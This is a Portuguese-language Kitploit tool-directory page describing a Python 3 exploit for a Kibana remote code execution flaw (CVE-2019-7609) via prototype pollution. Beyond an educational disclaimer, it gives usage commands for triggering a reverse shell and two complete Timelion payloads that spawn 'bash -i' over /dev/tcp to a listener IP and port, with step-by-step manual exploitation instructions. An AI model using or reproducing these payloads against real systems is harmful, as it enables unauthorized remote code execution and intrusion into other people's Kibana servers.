Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-7069-POC — Python 3 exploit para Kibana < 6.6.1 RCE (CVE-2019-7609) via poluição de protótipo, com detecção automática de versão e reverse shell opcional. | Kitploit
Ferramentas/GitHubGitHub/caelumisme/cve-2019-7069-poc
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoDesenvolvimento de Payloads
GitHubcaelumisme/cve-2019-7069-poc

CVE-2019-7069-POC

Python 3 exploit para Kibana < 6.6.1 RCE (CVE-2019-7609) via poluição de protótipo, com detecção automática de versão e reverse shell opcional.

Ver Repositório
1há 10 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Kibana < 6.6.1 Exploit de Execução Remota de Código (CVE-2019-7609)

Banner do Exploit

🚨 Exploit RCE Educacional 🚨

Autor: LandGrey (Refatoração Python3 por [Seu Nome])
Referência: Exploit-DB 46651
CVE: CVE-2019-7609


⚠️ Aviso:
Este script é apenas para testes de penetração educacionais e autorizados. Não o utilize em sistemas que não possui ou para os quais não tem permissão explícita para testar. O autor e contribuidores não se responsabilizam por qualquer uso indevido ou dano causado por esta ferramenta.


🎯 O que é isso?

Este é um script de exploit em Python 3 para a vulnerabilidade de Execução Remota de Código em versões do Kibana < 6.6.1. Ele aproveita uma falha de poluição de protótipo para executar comandos arbitrários, incluindo a abertura de uma shell reversa, em uma instância vulnerável do Kibana.

🕹️ Funcionalidades

  • Detecta a versão do Kibana automaticamente
  • Verifica o status da vulnerabilidade
  • Opcionalmente dispara uma shell reversa para o seu listener
  • Saída no terminal limpa e interativa
  • Totalmente compatível com Python 3
  • 📚 Referências

    • Exploit-DB Entry 46651
    • Kibana Official Site
    • CVE-2019-7609

    🚀 Uso

    root@kitploit:~
    python3 kibana_exploit.py -u http://target-kibana:5601
    

    Para disparar uma shell reversa:

    root@kitploit:~
    python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
    

    Exemplo

    root@kitploit:~
    python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
    

    🛠️ Requisitos

    • Python 3.x
    • Biblioteca requests
    • Biblioteca packaging

    Instale as dependências com:

    root@kitploit:~
    pip install requests packaging
    

    💡 Exploração Manual via Timelion

    Você também pode explorar esta vulnerabilidade manualmente usando o visualizador Timelion do Kibana:

    1. Abra o Kibana
    2. Cole um dos payloads a seguir no visualizador Timelion
    3. Clique em Executar (Run)
    4. No painel esquerdo, clique em Canvas
    5. Sua shell reversa deve aparecer! :)

    Payload por securityMB:

    root@kitploit:~
    .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
    .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
    

    Payload por chybeta:

    root@kitploit:~
    .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
    .props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
    

    Substitua 192.168.1.100 e 4444 pelo IP e porta do seu próprio listener.


    🧩 Como Funciona

    • Detecta a versão do Kibana através de uma requisição HTTP
    • Verifica se o alvo é vulnerável ao CVE-2019-7609
    • Explora a poluição de protótipo para executar comandos arbitrários
    • Opcionalmente, dispara uma shell reversa para o host e porta especificados

    🎨 Saída

    O script fornece uma saída clara e passo a passo para detecção, verificação e exploração, tornando-o fácil de acompanhar e divertido de usar!


    👾 Para Diversão & Aprendizado

    Este script é uma ótima maneira de aprender sobre poluição de protótipo, execução remota de código e técnicas de teste de penetração. Use-o com responsabilidade e sempre com permissão!


    📝 Licença

    Este projeto é apenas para uso educacional. Sem garantias ou responsabilidades. Hacking ético, mantenha-se curioso e divirta-se!

    Baixar ferramenta